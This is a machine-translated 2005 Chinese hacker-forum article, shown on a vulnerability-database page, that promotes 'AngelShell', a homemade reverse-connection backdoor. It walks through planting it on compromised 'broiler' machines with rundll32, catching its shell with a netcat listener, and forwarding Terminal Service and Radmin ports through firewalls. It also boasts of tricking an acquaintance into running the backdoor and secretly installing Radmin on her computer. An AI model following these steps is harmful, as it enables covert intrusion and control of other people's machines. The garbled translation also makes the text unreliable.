Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:6220054944
HistoryNov 30, 2005 - 12:00 a.m.

AngelShell: let all the forward program to achieve the reverse connection application papers-the vulnerability warning-the black bar safety net

2005-11-3000:00:00
佚名
www.myhack58.com
8
JSON

Nowserviceis almost entirely put in a hardware firewall, hard to penetrate, only to find that with a hardware Firewall, the party pooper! What TerminalService, what Radmin and the like in a controlled manner do not even think. Tried, found that almost all support reverse connection, the forward connection can only CONNECT 8 0 2 1 port connection 1 4 3 3 are connected. That’s a reverse of the back door go up, a pass up is antivirus the Kill. Angrily, moved out of Delphi, do-it-yourself write-back door in! Spent a few days time, the back door is finally written, and also reached the ideal requirements, the use effect is very nice, enough to called a hardware firewall and within the network of broilers nightmare! Dare not exclusive, and quickly out for everyone to share.
This app called AngelShell, here with my chickens and their use of the computer to do the test. The first need in the local configuration a described in the reverse of the connection information file, the first line is your IP, the second line is with NC listening port. Well written post to put it into the HTTP space, and then the configuration: the configured password, and you just upload to the FTP space, HTTP access address.
You can select to generate DLLserviceend or EXEserviceend, wherein EXEserviceend run directly to install, and the DLL in theserviceend you need to use the following command to install:“rundll32 dll path, I”, remember the last one I have to uppercase.

Tip: the program author is actually in order to easy for everyone to only provide EXEserviceend, its essence is also to install the DLL program, just use the program to unpack andautoto achieve the installation.

Here I to DLLserviceend to illustrate the Van. First the DLL is transmitted to the beloved of the broiler above, and then in the command line above into:“the rundll32 angel.dll,I”. Note that here I is through the FTP connection on the broiler, in order to facilitate directly with the FTP command-line installation.
Installed, on your machine:“nc –v –l –p 7 7 8 7”monitor 7 7 8 7 port, that is, I started to write the configuration file the port. After a while the NC will prompt information transmission, enter the password, hit Enter, OK, the connection is successful. Help information is displayed, the cute Shell out.
Tip: this Backdoor also provides some additional commands, you can direct the Shell to execute. The author in order to avoid the existing program name conflicts, so additional commands are all lowercase.

Here, we might think that even this back door in addition to can generate EXEserviceother than the end, but also nothing special. Of course, these features are of course not enough to build out my features, but also can not be considered a hardware firewall… This time we used the back door, not only is to make it yourself be able to achieve the reverse connection, and to make all other to the positive connection of the program are to achieve the reverse connection, such as TerminalService, Radmin, MSSQL and so on! Oh, do not be surprised, the good games are behind it, even will not let you down, Let’s GO!
See Shell in Fport additional commands, no? That is port forwarding, which can put a remote computer to any port of the reverse analog to the local. What? You don’t get it? Oh, okay, look down to know. We are the first to test out the Windows of the TerminalService. The broiler before I open through the TerminalService, but has been suffering from hardware firewall to intercept and unable to connect, today good cool!

Tip: Fport of usage:
fport
Wherein the parameter local port refers to you in the broiler on to forward the port, Your IP is your IP orname, and YourPort is your client listening on the port.

Open the client in the“to analog port”above fill 3 3 8 9, in the“Connect to the remote computer port”any fill, of course, do not have to open a port conflict, where I filled 7 7 8 8, and then point“start listening”to. Hurry to the chicken of the Shell below the knock-in: the“fport 3 3 8 9 61.187.. 7 7 8 8”。 Which 3 3 8 9 is a broiler of the TerminalServicePort 7 7 8 8 is our side the connection to the remote computer port. Then the client launched on the prompt has been received to a remote computer is connected, the prompt at this point can already be connected to the local 3 3 8 9 port. So we put the broiler on 3 3 8 9 port moved to their own love machine come up.
Friends, what are we waiting for? Open a TerminalServiceto the login Controller, IP fill in local 1 2 7. 0. 0. 1, The connection, the client immediately displays has been successfully established a new connection, and Remote Desktop log on dialog box, I heart that excited Ah, really words can not Express!
We then try to login two users, the client and successfully established a new connection. It turns out that at the same time logged in 2 User a success! Of course, if you wish you can log in more users, I’mprogrammingwhen the settings of each connection through the 2 threads to carry outdataof the transmission, so the transmission speed is guaranteed.
Being immersed in the joy when the phone rang, turned out to be a MM to buy a camera, asked me to help her dress, this also want to go? So he called her on the QQ, just to even re-test once. The MM although there is no hardware-level firewall, but her internal network, with Windows XP Professional Edition. I just put the EXE in theserviceend to her and tell her to run, and then in the local listening, after a while it prompts to receive the information and need to enter a password. After entering the password to get a Shell, then use the file download function to the She installed a Radmin, enough insidious! Then typing the following command:“fport 4 8 9 9 61.187.. 7 7 8 8”,her 4 8 9 9 port forwarding to my 4 8 9 9 port, and then in the local open the Radmin Viewer, connect to IP write 1 2 7. 0. 0. 1, The port will use the default 4 8 9 9, successful connection!。

Help her open the Device Manager, 三下五除二 installed a perturbation of the head Driver, the MM also LEng on that don’t know what’s going on, ha ha, waiting for her reaction came after the worship! Non-clamoring to worship me as a teacher, Khan… The test here will be over heart happy to mention it, huh!

The program is theoretically support any Protocol, but due to certain Protocol of particularity, it will the IP be verified, so may not reach our desired effect. For example, a WEBservice, today would have been to put the broiler on 8 0 port the transfer over, want to lie lie to someone that own a website. Results A up but display nothing:“No web… in this…”that Probably means that this address is not a WEBservice, which was reminiscent of the HTTP Protocol, there are a Host of value does not meet, and no wonder.
The final way on the internal network using the present procedures of the method. If your internal network while need a to allow a positive connection of the broiler to do the transfer, the transfer of thatservicecontroller of the port go to this transit the broiler, and then directly connected to this transit broiler is equivalent to the connectionservice!
Well, hopefully this article can bring you help, friends can see here, I have also been very grateful. Finally I wish you always happy, technologyis booming!

JSON